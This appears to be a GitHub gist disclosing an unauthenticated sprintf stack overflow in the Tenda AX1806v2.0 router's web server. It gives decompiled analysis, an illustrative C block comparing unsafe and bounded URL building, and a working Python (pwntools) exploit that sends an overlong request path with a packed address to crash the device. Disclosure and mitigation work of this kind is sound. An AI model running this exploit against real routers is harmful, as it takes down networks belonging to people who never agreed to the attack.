@Swind1er
Created July 19, 2024 08:25

Tenda Home Wireless Router AX1806v2.0 Stack Overflow Vulnerability POC

Manufacturer's official website

Tenda official website (腾达)

Affected device models

Dual-Band Gigabit Wi-Fi 6 Router AX1806v2.0

Affected firmware version

AX1806 upgrade software (升级软件) V1.0.0.1

Vulnerability type

[DoS] Unauthorized Denial of Service Attack

Vulnerability description

In the latest firmware of the AX1806 by Shenzhen Tenda Technology Co., Ltd., there exists an unauthorized denial of service (DoS) vulnerability. The web server in the firmware's file system does not properly restrict the length of certain fields when processing user requests, leading to a stack overflow vulnerability based on sprintf, which subsequently causes a denial of service attack.

Make your life simpler

[Tenda AX1806v2.0 stack overflow vulnerability proof video (Video/Tenda AX1806v2.0栈溢出漏洞证明视频.mp4 at main · Swind1er/Video, github.com)](https://github.com/Swind1er/Video/blob/main/Tenda AX1806v2.0栈溢出漏洞证明视频.mp4)

Vulnerability analysis


The web server program tdhttpd in the firmware file system contains the affected routine at RVA 0x0002018C (as shown in IDA); the key decompiled code, summarized, is as follows:

```c
  Var = (const char *)webGetVar(a1, "HTTP_HOST", websHostUrl);
  // `sprintf` does not limit the length of what it formats into `s`: an
  // unauthenticated attacker can supply excessively long data in the third
  // argument (the request path at a1 + 0xA4), overflowing the stack buffer
  // and causing a denial of service.
  sprintf(s, "https://%s%s", Var, *(const char **)(a1 + 0xA4));
  sub_2A714(a1, s);
  return v5;
```

It can be observed that the program does not restrict the length of the string at (a1 + 0xA4), while the buffer s has a fixed size. When the string at (a1 + 0xA4) (which corresponds to the requested path) is excessively long, the sprintf call overruns s and causes a stack overflow, as detailed in the exploit below.
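As an added illustration that is not part of this gist or of Tenda's firmware, the following C shows the unbounded `sprintf` pattern from the decompiled snippet next to a bounded replacement that rejects input that would not fit. `URL_BUF_SIZE`, the function names, and the sample inputs are assumptions made here for illustration; the real size of `s` in tdhttpd is not stated on this page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for illustration; the real size of `s` in tdhttpd is
 * not stated on the page. */
#define URL_BUF_SIZE 256

/* Mirrors the decompiled tdhttpd pattern: sprintf writes "https://" + host +
 * path into a fixed buffer with no bound, so a request path longer than the
 * remaining space overruns the stack. Kept here only for comparison; it is
 * safe solely when the caller has already verified the result fits. */
int build_url_unsafe(char out[URL_BUF_SIZE], const char *host, const char *path)
{
    sprintf(out, "https://%s%s", host, path);
    return 0;
}

/* Hardened form: snprintf never writes past outsz, and its return value is the
 * length the full string would have had, so n >= outsz means truncation.
 * Oversized input is rejected (-1, empty string) instead of being silently
 * truncated into a malformed redirect URL. */
int build_url_safe(char *out, size_t outsz, const char *host, const char *path)
{
    if (out == NULL || outsz == 0 || host == NULL || path == NULL)
        return -1;
    int n = snprintf(out, outsz, "https://%s%s", host, path);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Returns 1 if build_url_safe produces exactly `expected` for host/path. */
int url_builds_to(const char *host, const char *path, const char *expected)
{
    char buf[URL_BUF_SIZE];
    if (build_url_safe(buf, sizeof buf, host, path) != 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

/* Constructs a path "/aaaa..." of `len` bytes (in the spirit of the PoC's long
 * path) and reports whether build_url_safe accepts it for the default buffer.
 * With host "192.168.0.1" (11 bytes) and "https://" (8 bytes), the URL fits
 * only while 19 + len < URL_BUF_SIZE, i.e. len <= 236. */
int long_path_fits(size_t len)
{
    char path[1024];
    char buf[URL_BUF_SIZE];
    if (len == 0 || len >= sizeof path)
        return 0;
    memset(path, 'a', len);
    path[0] = '/';
    path[len] = '\0';
    return build_url_safe(buf, sizeof buf, "192.168.0.1", path) == 0;
}

int main(void)
{
    char buf[URL_BUF_SIZE];
    if (build_url_safe(buf, sizeof buf, "192.168.0.1", "/index.html") == 0)
        printf("accepted: %s\n", buf);
    printf("236-byte path fits: %d\n", long_path_fits(236));
    printf("237-byte path fits: %d\n", long_path_fits(237));
    return 0;
}
```

The point of checking `n >= outsz` rather than `n > outsz` is that `snprintf` reserves one byte of `outsz` for the terminating NUL; a result of exactly `outsz` characters is already truncated.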

EXP

```python
from pwn import *

host = "192.168.0.1"  # Replace with the IP address of the test router.
port = 80

# Crafted GET request: the request path is a long cyclic pattern followed by a
# packed 32-bit value, which overruns the fixed-size buffer that tdhttpd
# formats the URL into with sprintf.
request = (
    b"GET /aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaak1234"+p32(0x0003A71C)+b"HTTP/1.1\r\n"
    b"Host:"+bytes(host,encoding='utf-8')+b"\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
    b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    b"Accept-Language: en-US,en;q=0.5\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Upgrade-Insecure-Requests: 1\r\n"
    b"Sec-Fetch-Dest: document\r\n"
    b"Sec-Fetch-Mode: navigate\r\n"
    b"Sec-Fetch-Site: none\r\n"
    b"Sec-Fetch-User: ?1\r\n"
    b"Te: trailers\r\n"
    b"Connection: close\r\n\r\n"
)

# Send the request to the router's web server and read whatever comes back
# before the connection drops.
conn = remote(host, port)
conn.send(request)
response = conn.recvall()
conn.close()
```